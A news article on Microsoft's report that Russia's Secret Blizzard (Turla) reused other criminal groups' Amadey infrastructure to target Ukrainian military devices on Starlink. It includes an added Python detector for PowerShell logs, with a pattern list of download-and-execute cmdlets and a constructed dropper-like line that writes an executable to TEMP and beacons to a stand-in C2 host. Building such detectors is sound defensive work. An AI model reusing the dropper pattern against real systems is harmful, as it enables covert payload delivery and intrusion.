Natalia Khandusenko, Hot News
12 December 2024, 11:58
Russian hackers are using the infrastructure of other cybercriminals to get to Starlink-connected military devices, Microsoft says
Russian hackers from the Secret Blizzard group, also known as Turla and linked to Russian intelligence, took an unusual route — they appropriated the infrastructure of other cybercriminals and used it to infect the devices of the Ukrainian military on the front lines.
In at least two cases this year, Secret Blizzard hackers used the servers and malware of other cybercriminals to attack Ukrainian military devices, Microsoft said Wednesday.
In one case the hackers used the infrastructure of the group Storm-1919; in another they appropriated the resources of Storm-1837, another Russian group that has attacked Ukrainian drone operators.
From March to April of this year, the Secret Blizzard group used the Amadey bot that Storm-1919 usually uses for cryptojacking.
“Secret Blizzard either used the Amadey malware-as-a-service (MaaS) or secretly accessed Amadey's command-and-control (C2) panels to download a PowerShell dropper to target devices. The PowerShell dropper contained a Base64-encoded Amadey payload, supplemented with code that made a request to the Secret Blizzard C2 infrastructure,” Microsoft said.
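The dropper pattern Microsoft describes, a Base64-encoded payload embedded in a PowerShell script alongside code that calls out to a C2 server, is something defenders can look for in PowerShell script-block logs. The following is an added detection example written for this article; it is not code from Microsoft's report or from any of the groups mentioned. It assumes script-block logging is enabled (the hypothetical records below mimic the ScriptBlockText field of such logs) and the log entries, the fake PE bytes and the C2 hostname are all constructed for illustration.

```python
import base64
import re
from dataclasses import dataclass, field

# A run of 40+ Base64 characters with optional padding: long enough to skip
# ordinary identifiers and short enough to catch embedded payloads.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Cmdlets and .NET calls commonly used to fetch or run remote content.
NETWORK_CALLS = re.compile(
    r"Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|DownloadString|"
    r"DownloadFile|Start-BitsTransfer|Invoke-Expression|\bIEX\b",
    re.IGNORECASE,
)


@dataclass
class Finding:
    record_id: str
    base64_blobs: int                      # number of decodable blobs found
    embedded_pe: bool                      # a blob decoded to an MZ (PE) header
    network_calls: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # The article's dropper combines an embedded payload with a C2 request;
        # either signal alone is too noisy, together they merit triage.
        return self.base64_blobs > 0 and bool(self.network_calls)


def decode_blob(blob: str) -> bytes:
    """Strictly decode a candidate Base64 string; return b'' if it is not valid."""
    try:
        return base64.b64decode(blob, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return b""


def analyze_record(record_id: str, script_text: str) -> Finding:
    """Score one script-block log entry for the embedded-payload-plus-C2 pattern."""
    decoded = [decode_blob(m.group(0)) for m in B64_BLOB.finditer(script_text)]
    decoded = [d for d in decoded if d]
    calls = sorted({m.group(0) for m in NETWORK_CALLS.finditer(script_text)})
    return Finding(
        record_id=record_id,
        base64_blobs=len(decoded),
        embedded_pe=any(d[:2] == b"MZ" for d in decoded),
        network_calls=calls,
    )


def triage(records: list[dict]) -> list[Finding]:
    """Return the findings for every record that matches the dropper pattern."""
    findings = [analyze_record(r["RecordId"], r["ScriptBlockText"]) for r in records]
    return [f for f in findings if f.suspicious]


# --- Constructed sample data (not real log entries or real malware) ---------
FAKE_PE = base64.b64encode(b"MZ\x90\x00" + b"\x00" * 60).decode()
FAKE_CONFIG = base64.b64encode(b'{"interval": 300, "server": "internal.example"}').decode()

SAMPLE_RECORDS = [
    {   # ordinary admin activity: no blob, no download
        "RecordId": "ps-0001",
        "ScriptBlockText": "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB } | Sort-Object Length",
    },
    {   # dropper-like: embedded PE written to disk, then a request to a C2 host
        "RecordId": "ps-0002",
        "ScriptBlockText": (
            "$b=[Convert]::FromBase64String('" + FAKE_PE + "');"
            "[IO.File]::WriteAllBytes(\"$env:TEMP\\svc.exe\",$b);"
            "Invoke-WebRequest -Uri http://c2.example.invalid/beacon -UseBasicParsing"
        ),
    },
    {   # Base64 config blob but no network activity: should not be flagged
        "RecordId": "ps-0003",
        "ScriptBlockText": (
            "$cfg=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
            + FAKE_CONFIG + "')) | ConvertFrom-Json"
        ),
    },
]

if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f"{f.record_id}: blobs={f.base64_blobs} pe={f.embedded_pe} calls={f.network_calls}")
```

Only the second record is flagged: the third carries a Base64 blob but makes no outbound call, and the first has neither. In production the same logic would read Windows PowerShell event 4104 entries and would be tuned with an allowlist of known installer scripts, since legitimate deployment tooling also embeds encoded content and downloads files.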
The ultimate goal was to install Tavdig, a Secret Blizzard backdoor used for reconnaissance on targets of interest to the attackers. In the Amadey sample, Microsoft found that information was collected from device clipboards and that passwords were harvested from browsers. The group then installed a custom reconnaissance tool that was "selectively deployed on devices of further interest to the threat actor — such as devices originating from Starlink IP addresses," writes Ars Technica.
When hackers decided a target was of high value, Tavdig was installed to collect information, including "user information, network statistics, and installed patches, and to import registry settings to the compromised device."
"It's not uncommon for attackers to use the same tactics or tools, although we rarely see evidence of them compromising and exploiting the infrastructure of other actors," said Sherrod DeGrippo, Director of Threat Intelligence Strategy at Microsoft, in an interview with The Hacker News.